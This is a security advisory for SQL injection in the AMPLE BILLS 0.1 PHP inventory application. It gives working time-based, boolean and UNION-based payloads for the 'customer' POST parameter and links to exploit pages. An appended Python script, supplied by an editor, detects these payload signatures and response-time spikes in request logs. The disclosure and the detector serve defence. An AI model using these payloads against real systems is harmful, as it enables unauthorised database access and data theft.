AMPLE BILLS 0.1 SQL injection

2024.04.15
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## Title: AMPLE BILLS 0.1 Multiple-SQLi
## Author: nu11secur1ty
## Date: 04/13/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The customer parameter (#1*) appears to be vulnerable to SQL injection attacks. The payload (select*from(select(sleep(20)))a) was submitted in the customer parameter. The application took 20017 milliseconds to respond to the request, compared with 4 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The database appears to be MySQL. The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:

```mysql
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: customer=(-2876) OR 5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: customer=(-8147) UNION ALL SELECT CONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html)

## Time spent: 01:15:00
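The advisory reports two observable signals for this bug: the payload shapes in the POST body (sleep()-based, boolean `OR n=n`, and `UNION ALL SELECT`) and the response-time jump from 4 ms to 20017 ms. The following script, added here as an editor's example and not part of the advisory or the vendor's software, shows how a defender can turn both signals into a detection over web-server request records. The log records, the `BASELINE_MS` and `DELAY_THRESHOLD_MS` values, and the function names are constructed assumptions; the request bodies are modelled on the advisory's payloads.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs

# Constructed sample of (POST body, response time in ms) records, shaped after
# the requests described in the advisory. These are made-up records, not real logs.
SAMPLE_LOG = [
    ("customer=42&issuedate=03/15/2024 - 04/13/2024", 4),
    ("customer=(select*from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024", 20017),
    ("customer=(-2876) OR 5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024", 5),
    ("customer=(-8147) UNION ALL SELECT CONCAT(0x71,0x41,0x71),7839,7839,7839,7839#&issuedate=03/15/2024 - 04/13/2024", 6),
]

# Signatures for the three injection styles named in the advisory's sqlmap output.
SIGNATURES = {
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "boolean-based": re.compile(r"\b(or|and)\s+\(?\d+\)?\s*=\s*\(?\d+\)?", re.I),
    "union-based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

BASELINE_MS = 4              # normal response time of the endpoint (advisory: 4 ms)
DELAY_THRESHOLD_MS = 10_000  # assumed delta above baseline that counts as an induced delay


@dataclass
class Finding:
    param: str
    kinds: list
    response_ms: int
    timing_anomaly: bool


def classify_value(value: str) -> list:
    """Return the names of every signature that matches one parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def inspect_request(body: str, response_ms: int, baseline_ms: int = BASELINE_MS) -> list:
    """Inspect one POST body: flag parameters carrying SQLi payloads, and mark
    requests whose response time jumped far above the baseline (time-based blind SQLi)."""
    slow = (response_ms - baseline_ms) >= DELAY_THRESHOLD_MS
    findings = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            kinds = classify_value(value)
            if kinds:
                findings.append(Finding(param, kinds, response_ms, slow))
    # A large delay with no recognisable payload is still worth an alert:
    # the payload may be encoded or obfuscated beyond these signatures.
    if slow and not findings:
        findings.append(Finding("*", [], response_ms, True))
    return findings


def scan(log) -> list:
    """Run inspect_request over (body, response_ms) records and return
    (record index, findings) for every record that produced a finding."""
    results = []
    for i, (body, ms) in enumerate(log):
        findings = inspect_request(body, ms)
        if findings:
            results.append((i, findings))
    return results


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_LOG):
        for f in findings:
            print(f"record {i}: param={f.param} kinds={f.kinds} "
                  f"response={f.response_ms}ms timing_anomaly={f.timing_anomaly}")
```

The signature check alone would miss an obfuscated payload, and the timing check alone would fire on an unrelated slow query; correlating the two on the same request is what gives a usable alert. The baseline and threshold would normally be derived per endpoint from historical response times rather than hard-coded.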


Copyright 2024, cxsecurity.com
